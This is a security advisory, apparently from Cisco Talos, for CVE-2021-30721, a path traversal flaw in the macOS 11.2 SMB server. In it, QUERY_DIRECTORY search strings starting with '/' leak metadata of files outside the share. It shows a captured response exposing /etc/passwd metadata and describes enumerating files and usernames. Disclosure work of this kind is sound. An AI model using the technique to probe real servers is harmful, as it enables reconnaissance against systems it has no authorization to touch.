CVE-2021-30721
An arbitrary file access vulnerability exists in the SMB Server Apple macOS 11.2. A specially crafted SMB request can leak metadata of arbitrary files. This vulnerability can be triggered by sending a malicious packet to the vulnerable server.
Apple macOS 11.2
4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
macOS is a series of proprietary operating systems developed by Apple with macOS 11.2, with Big Sur being the latest.
Server Message Block (SMB) is a network file sharing protocol widely used in Windows network environments and macOS contains a proprietary implementation of both server and client components. SMB is often used in office and enterprise environments for file and printer sharing.
Three distinct versions and multiple dialects of SMB protocol are supported by macOS’ SMB server. This vulnerability is present in SMB2 and newer versions of the protocol, more specifically in the QUERY_DIRECTORY processing which is used to enumerate directory information and contents. Protocol specifications show that QUERY_DIRECTORY structure can contain a unicode buffer that represents a search string to be run on a queried directory. This search string is meant to contain a file name or a wildcard string to filter results of the query.
Normally, an authenticated user only permitted to access and query directories and files that fall under the share that is being accessed. A file open query, for example, on a file outside the share will fail with insufficient access right error if attempted as proper checks are made. When QUERY_DIRECTORY is being processed in smb2_dispatch_query_directory, function darwin::darwin_directory::query_directory gets called which basically treats the input string in two ways. First, if the query string contains special characters, it treats it as a special regex and then iterates over results which it passes to darwin::query_relative_name function. Second, if no special characters are present in the string, query string is passed to darwin::query_relative_name almost directly. The vulnerability lies in the fact that the query string can contain a regular UNIX path that beings with / which would allow an attacker to access any file on the file system , presuming the underlying user has access right to it. Metadata about the file or directory is returned to the user which can include access timestamps, sizes and other information. Following example shows QUERY_DIRECTORY response that reveals metadata of /etc/password:
Find Response (0x0e)
[Info Level: SMB2_FIND_ID_FULL_DIRECTORY_INFO (38)]
StructureSize: 0x0009
Blob Offset: 0x00000048
Blob Length: 102
Info: 000000000000000000c316529052d601dc01e99d3a77d601…
FileIdBothDirectoryInfo: etcpasswd
Next Offset: 0
File Index: 0x00000000
Create: Jul 4, 2020 22:51:26.000000000 PDT
Last Access: Aug 20, 2020 14:41:09.511010800 PDT
Last Write: Jul 4, 2020 22:51:26.000000000 PDT
Last Change: Aug 20, 2020 14:41:09.512743300 PDT
End Of File: 6946
Allocation Size: 8192
File Attributes: 0x00000020
Filename Length: 22
EA Size: 0
Reserved: 00000000
File Id: 0x000000030004305a
Filename: etcpasswd
Additionally, if the file or directory does not exist, an error is sent in reply. This can be used to enumerate existing files and directories, especially user home directories which would reveal usernames which could be useful in further attacks.
2021-03-15 - Vendor Disclosure
2021-05-25 - Vendor Patched
2021-06-02 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.